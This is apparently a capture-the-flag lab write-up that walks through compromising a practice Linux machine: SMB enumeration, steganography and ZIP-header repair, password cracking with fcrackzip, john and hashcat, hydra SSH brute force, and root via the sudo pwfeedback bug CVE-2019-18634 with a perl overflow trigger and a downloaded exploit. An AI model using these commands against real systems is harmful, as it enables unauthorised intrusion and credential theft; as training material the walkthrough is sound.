In this new article, we will combine our cryptography skills with our penetration testing skills and attempt to infiltrate the target system.
In particular, we will learn how to manipulate a file's bytes with a few tools. This article will add to your toolbox.
You may notice that the IPs change from time to time; don't worry, we will be using different machines as we progress. The methodology is exactly the same throughout.
Keep your eyes peeled and get started with this fun article, cyberpunks!
Let’s make a quick start and save the values and IPs we will use most on the shell.
Register the target machine on local DNS. We will do this using the /etc/hosts file.
We are ready for other operations.
At this stage, we need to enumerate the network and the machine in front of us. This is how we map the attack surface. For this, we first use the nmap tool: nmap -sC -sV -oN nmap_result.txt -T4 -A --script=vuln -sS -Pn $target_ip
-sC: Runs the default set of Nmap scripts. These scripts perform basic information-gathering tasks such as detecting services and versions, checking for known vulnerabilities, and more.
-sV: Detects the version of the services running on open ports.
-oN nmap_result.txt: Writes the scan results in normal format to the file nmap_result.txt.
-T4: Sets the timing template to "aggressive," making the scan faster. Timing templates range from -T0 (slowest) to -T5 (fastest); -T4 is a good balance between speed and accuracy for most situations.
-A: Enables OS detection, version detection, script scanning, and traceroute.
--script=vuln: Runs the vulnerability detection scripts. These scripts can identify known vulnerabilities in the services running on the target.
-sS: Performs a SYN scan. This is the default scan type for a privileged user and is less noisy than a full connect scan.
-Pn: Disables host discovery. Nmap assumes the host is up and scans the specified ports even if the host does not respond to ping.
$target_ip: The IP address of the target to be scanned.
We received advisory CVE notes along with version information, open ports and the applications behind them. In a real scenario, every detail you find here is critical.
22 SSH OpenSSH 7.6p1
139 Netbios-SSN Samba smbd
445 Netbios-SSN Samba smbd
Port 22 — SSH (Secure Shell)
Service: SSH
Version: OpenSSH 7.6p1
Description: SSH is a protocol used to securely connect to remote systems. OpenSSH is a popular implementation of the SSH protocol. The version 7.6p1 indicates the specific release of the OpenSSH software.
Port 139 — NetBIOS Session Service
Service: NetBIOS-SSN
Application: Samba smbd
Description: NetBIOS Session Service (NetBIOS-SSN) is used for session-layer communications on a NetBIOS network. Samba is a software suite that allows file and print sharing between Unix/Linux and Windows systems. The smbd daemon provides the file sharing service in Samba.
Port 445 — NetBIOS Session Service
Service: NetBIOS-SSN
Application: Samba smbd
Description: Port 445 is used by the Server Message Block (SMB) protocol directly over TCP/IP. This port allows file sharing and various network communications without the NetBIOS layer. Samba's smbd daemon listens on this port to provide file and printer sharing services compatible with Windows networking.
Our first impression is that the attack scenario will be built around SMB.
SMB, which stands for Server Message Block, is a network protocol used for providing shared access to files, printers, and serial ports between nodes on a network. It is primarily used in Microsoft Windows systems but can be implemented in Unix-like systems via software such as Samba. SMB operates over TCP/IP and uses port 445 for direct hosting over TCP/IP without the need for the NetBIOS layer. It can also use ports 137–139 via the NetBIOS over TCP/IP. SMB uses authentication to ensure that only authorized users can access shared resources. This typically involves user credentials (username and password). Modern versions of SMB (like SMB3) support encryption to protect data transmitted over the network from eavesdropping. SMB has had several high-profile vulnerabilities, such as EternalBlue, which was exploited by the WannaCry ransomware attack. Keeping SMB software up to date is crucial for security.
The first step is to check whether it accepts login without a password and how possible it is to access the shares.
Let’s scan with a tool you are not very familiar with. Our first example will be via smbmap: smbmap -H $target_ip
As you can see, a share named "Anonymous" is listed and readable.
Another example is the smbclient tool: smbclient \\\\$target_ip\\Anonymous
We are in. We did not need to provide a password.
Let’s give another example of how to enumerate this file via SMB before downloading this .txt file. We will use our nmap tool again for this: nmap -sV -A -T4 --script=smb-enum-shares $target_ip
As you can see, there are similar findings. To get a slightly more detailed output, you can choose the enum4linux tool: enum4linux $target_ip -a -r -o -i
Let's download this file again with a command: smbmap -H $target_ip --download 'Anonymous/journal.txt'
You can also do this through the SMB client from which you connect.
Let’s give an example from Metasploit. We will use auxiliary/scanner/smb/smb_enumshares as the module. Run msfconsole with msfconsole -q command. Then use this module.
Provide the required parameters.
Just run it.
Let’s look at the content and definition of this file we obtained.
It appears to be plain text, but when you examine it carefully, you will see that it looks like Base64. You can decode it with the following command: cat journal.txt | base64 -d
Did you see the PNG header? The first bytes of the decoded data are the PNG magic number, shown here in hex.
Now we can save the decoded output directly as a separate file.
It looks like PNG image data.
There are many commands or tools with which you can analyze this. For example, here is the link to the toolkit: https://github.com/DominicBreuker/stego-toolkit
You can use the .sh files inside.
Use check_png.sh script.
This gives you many outputs. You should examine them all in detail. The detail that catches our eye is that the file size is larger than we expected. It is 2.6 MB.
First, let’s see what’s hidden in the content. zsteg is a tool used for detecting hidden data (steganography) in PNG and BMP image files. It is particularly useful in the field of digital forensics and cybersecurity for uncovering hidden messages or data that might be embedded within image files using various steganographic techniques.
There are many keys containing secrets.
stegpy is a Python-based tool used for steganography, which is the practice of hiding data within other non-secret data, typically in image files. stegpy specifically allows you to hide and extract messages or files within image files using Python.
We got a .zip file as the output of this command. Let’s unzip.
Oops… It is recognised as a .zip file, but we get a format and offset error. We need to investigate this.
JPEG image data? What is going on here? We can obtain details using the exiftool tool.
Did you see the message from “warning” section? It looks like this file has been tampered with.
For more details and methods, check out this resource: https://book.hacktricks.xyz/crypto-and-stego/stego-tricks
To extract this .zip file correctly, we must look at the hex layout. For this we need the hexeditor tool.
This is in an editable format. You must be careful when making changes here, otherwise you may damage the integrity of the entire file.
“Magic number” is important in file definitions.
A “magic number” is a specific sequence of bytes at the beginning of a file that uniquely identifies the file format. These bytes help software and operating systems recognize and correctly handle different file types.
The magic number for a PNG file is the first 8 bytes: 89 50 4E 47 0D 0A 1A 0A
89: Indicates that the file contains binary data and not text.
50 4E 47: The ASCII codes for "PNG".
0D 0A: Carriage return and line feed.
1A: Indicates end-of-file in DOS.
0A: Line feed.
JPEG/JFIF (JPEG File Interchange Format): FF D8 FF E0
The first two bytes FF D8 indicate the start of the image, and FF E0 indicates the JFIF segment.
JPEG/Exif (Exchangeable Image File Format): FF D8 FF E1
Similarly, FF D8 indicates the start of the image, and FF E1 indicates the Exif segment.
The bytes FF D8 mark the start of a JPEG file, as you can see in our result. But this file should be a .zip archive.
The magic number for a standard .zip file is: 50 4B 03 04
This sequence of bytes appears at the beginning of the file and identifies it as a .zip archive.
50 4B: These are the ASCII characters "PK", the initials of Phil Katz, the creator of the .zip file format.
03 04: These bytes identify a local file header of the PKZIP format (version 2.0 or higher).
Check this source for more file signatures: https://en.wikipedia.org/wiki/List_of_file_signatures
Let’s adjust this byte order according to the .zip file.
Then save it.
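As an added example (not code from the original article), here is a small Python helper that reproduces the checks above in one place: it decodes the Base64 text the way base64 -d does, identifies the magic number, detects a ZIP whose first bytes were overwritten with a JPEG signature, and restores 50 4B 03 04 the way we did by hand in hexeditor. The sample archive is constructed in memory and the member name journal.ctz inside it is only a placeholder.

```python
import base64
import io
import zipfile
# Magic numbers from the article, all checked at offset 0.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "PNG image",
    b"\xff\xd8\xff\xe0": "JPEG/JFIF image",
    b"\xff\xd8\xff\xe1": "JPEG/Exif image",
    b"PK\x03\x04": "ZIP archive",
}
ZIP_LOCAL_HEADER = b"PK\x03\x04"  # 50 4B 03 04, local file header signature
ZIP_CENTRAL_DIR = b"PK\x01\x02"   # central directory entry signature
ZIP_EOCD = b"PK\x05\x06"          # end of central directory signature

def decode_base64_text(text: str) -> bytes:
    """Same as 'base64 -d journal.txt'; whitespace and line breaks are ignored."""
    return base64.b64decode("".join(text.split()))

def identify(data: bytes) -> str:
    """Name the format whose magic number matches the first bytes of data."""
    for magic, name in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return "unknown"

def zip_header_spoofed(data: bytes) -> bool:
    """ZIP structures present (central directory + EOCD near the tail) but no ZIP
    signature at offset 0: the tampering seen in the article (header overwritten with FF D8)."""
    has_zip_body = ZIP_CENTRAL_DIR in data and ZIP_EOCD in data[-65557:]
    return has_zip_body and not data.startswith(ZIP_LOCAL_HEADER)

def repair_zip_header(data: bytes) -> bytes:
    """Put 50 4B 03 04 back into the first four bytes, as done by hand in hexeditor."""
    return ZIP_LOCAL_HEADER + data[len(ZIP_LOCAL_HEADER):]

def can_extract(data: bytes) -> bool:
    """True when every member reads cleanly (zipfile checks each local header's magic)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return all(zf.read(n) is not None for n in zf.namelist())
    except zipfile.BadZipFile:
        return False

def build_tampered_sample() -> bytes:
    """Constructed sample: a one-member ZIP whose header is replaced by the JPEG/JFIF magic."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("journal.ctz", b"constructed sample payload")  # placeholder member
    return b"\xff\xd8\xff\xe0" + buf.getvalue()[4:]
```

Note that zipfile.ZipFile still opens the tampered archive because the central directory at the end is intact; the error only appears when a member is read, which is why the check reads every member.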
Yes! We converted this manipulated file to .zip format, but we encountered a password obstacle. Let’s move on to the next stage.
We will perform brute-force to crack this .zip file.
Try this command: fcrackzip -v -b -D -u -p $wordlist_add_pass _journal.zip
It happened very quickly. We now have the password. Then unzip again.
We have file now.
A .ctz file is a compressed file format used by the Citrix Receiver, a client software that allows users to connect to virtual desktops and applications provided by Citrix servers. The .ctz extension is commonly associated with compressed configuration files or other data used by Citrix applications.
Try to get this.
We need to have a cracking process again.
We can choose the 7z2john.pl tool, which we have not used before.
The 7z2john.pl tool is a script used to extract hash data from 7-Zip (.7z) archive files for the purpose of password cracking. It is part of the John the Ripper (JtR) password cracking tool suite, which is widely used in security research and penetration testing. Before running this you must meet the requirements: sudo apt-get install -y libcompress-raw-lzma-perl
We will use this command: /usr/share/john/7z2john.pl journal.ctz > johnhashout
We need to break this value using the john tool: sudo john --wordlist=$wordlist_add_pass johnhashout
You will get the password in this way.
Now extract file again.
We have file now.
The new file we get is an XML file. We need to view it.
You can use CherryTree: sudo apt-get install cherrytree
We have access to the file. Save the files stored inside it and note everything.
When you examine the files in detail, you will see a user named “lily”.
Take a look at the files you obtained.
These look like password files. Remember that the SSH port is open, we can try a brute force on it.
Use: hydra -l lily -P cherry-blossom.list ssh://10.10.254.137 -V -f -e ns
The answer may take a while. You must be patient.
As a result you will get the password. Now let’s get a connection via SSH.
Yes! We are in.
Now it’s time to navigate a little and explore the system.
Backup files are quite attractive…
.bak files are backup files that are commonly created to preserve the original state of a file before it is modified. They are used as a safeguard to allow recovery of the original file if needed. In the case of the files listed here, these are backups of important system files on a Unix/Linux system.
Let’s examine these.
Wow! There are hashed passwords. Note these.
Let's crack this one as an example: $6$zV7zbU1b$FomT/aM2UMXqNnqspi57K/hHBG8DkyACiV6ykYmxsZG.vLALyf7kjsqYjwW391j1bue2/.SVm91uno5DUX7ob0
First, determine what kind of hash this is.
The $6$ prefix tells us it is SHA-512 crypt (sha512crypt). We will use hashcat for this: hashcat -m1800 -a0 --force '$6$zV7zbU1b$FomT/aM2UMXqNnqspi57K/hHBG8DkyACiV6ykYmxsZG.vLALyf7kjsqYjwW391j1bue2/.SVm91uno5DUX7ob0' cherry-blossom.list
Again, be patient and wait for the result. It will give you the cracked password.
Once you have the password, you just need to change the user.
Check privilege level for that user.
The same password is used, but asterisks ('*') are echoed while we type it… This alone does not give us command execution.
"pwfeedback" is the sudoers option behind this: when it is enabled, sudo echoes an asterisk for each character typed at the password prompt. Password feedback in general refers to the visual cues a command-line interface or terminal shows while you type a password, typically masking the characters (showing asterisks or dots instead of the actual characters) so the password is not visually exposed to others.
Before going into this in detail, let’s take a look at root access: find / -perm -4000 -user root -type f 2> /dev/null
What is “sudo” version:
So is there an exploit for "pwfeedback" in this sudo version? Check it.
Yes! We found one. It is tracked as CVE-2019-18634.
Download the script and review it.
You can run this by installing it on the target machine. Or let’s do manual operations.
Check perl:
You can use it: perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S /bin/bash
Yep! We got a Segmentation Fault. That is evidence that this system is vulnerable to the buffer overflow.
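From the defender's side, the two conditions that make a host exposed to this bug are a sudo version in the affected range and pwfeedback enabled in sudoers. The following audit helper is an added example (not from the original article or the sudo project); the affected range 1.7.1 through 1.8.30 inclusive is taken from the sudo project's advisory for CVE-2019-18634, and the version string and sudoers snippets are constructed samples, not the target machine's real output.

```python
import re

# Affected range from the sudo advisory for CVE-2019-18634 (assumption stated in the lead-in):
# 1.7.1 through 1.8.30 inclusive, and only when pwfeedback is enabled in sudoers.
AFFECTED_MIN = (1, 7, 1)
AFFECTED_MAX = (1, 8, 30)

def parse_sudo_version(sudo_v_output: str):
    """Read the x.y.z version from 'sudo -V' output; patch levels such as 'p2' are ignored."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    return tuple(int(x) for x in m.groups()) if m else None

def pwfeedback_enabled(sudoers_text: str) -> bool:
    """Walk Defaults lines in order: 'pwfeedback' enables, '!pwfeedback' disables.
    Scoped lines (Defaults:user, Defaults@host) are treated the same, conservatively.
    Text after '#' and non-Defaults lines are ignored."""
    enabled = False
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"Defaults\S*\s+(.*)", line)
        if not m:
            continue
        for opt in m.group(1).split(","):
            opt = opt.strip()
            if opt == "pwfeedback":
                enabled = True
            elif opt == "!pwfeedback":
                enabled = False
    return enabled

def assess(sudo_v_output: str, sudoers_text: str) -> dict:
    """Combine both conditions; the mitigation is upgrading sudo or the line 'Defaults !pwfeedback'."""
    version = parse_sudo_version(sudo_v_output)
    affected = version is not None and AFFECTED_MIN <= version <= AFFECTED_MAX
    enabled = pwfeedback_enabled(sudoers_text)
    return {"version": version, "version_affected": affected,
            "pwfeedback": enabled, "exposed": affected and enabled}

# Constructed samples (not the target machine's real output).
SAMPLE_SUDO_V = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"
SUDOERS_WEAK = "Defaults env_reset\nDefaults pwfeedback  # asterisks at the password prompt\n"
SUDOERS_FIXED = "Defaults env_reset\nDefaults !pwfeedback\n"
```

On a real host you would feed it the output of sudo -V and the contents of /etc/sudoers plus the files under /etc/sudoers.d.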
Now let’s try to get root permission through this.
You can find a valid exploit script for this. We found this: https://github.com/saleemrashid/sudo-cve-2019-18634
First of all, you need to download it locally.
Then compile .c file.
Activate HTTP server: python3 -m http.server
Request this file from the hijacked machine to your own HTTP server.
Yes, we transferred the file. You must make it executable with chmod.
All you have to do is run it.
Yes! We are root now.
Let's add some extra information.
If you get an error like this, compile with the target system's own toolchain instead. To do this, first transfer the .c file to the target system.
Now compile it on the target system.
Then run it.
Don’t give up on hacking.
Code for good.
^-^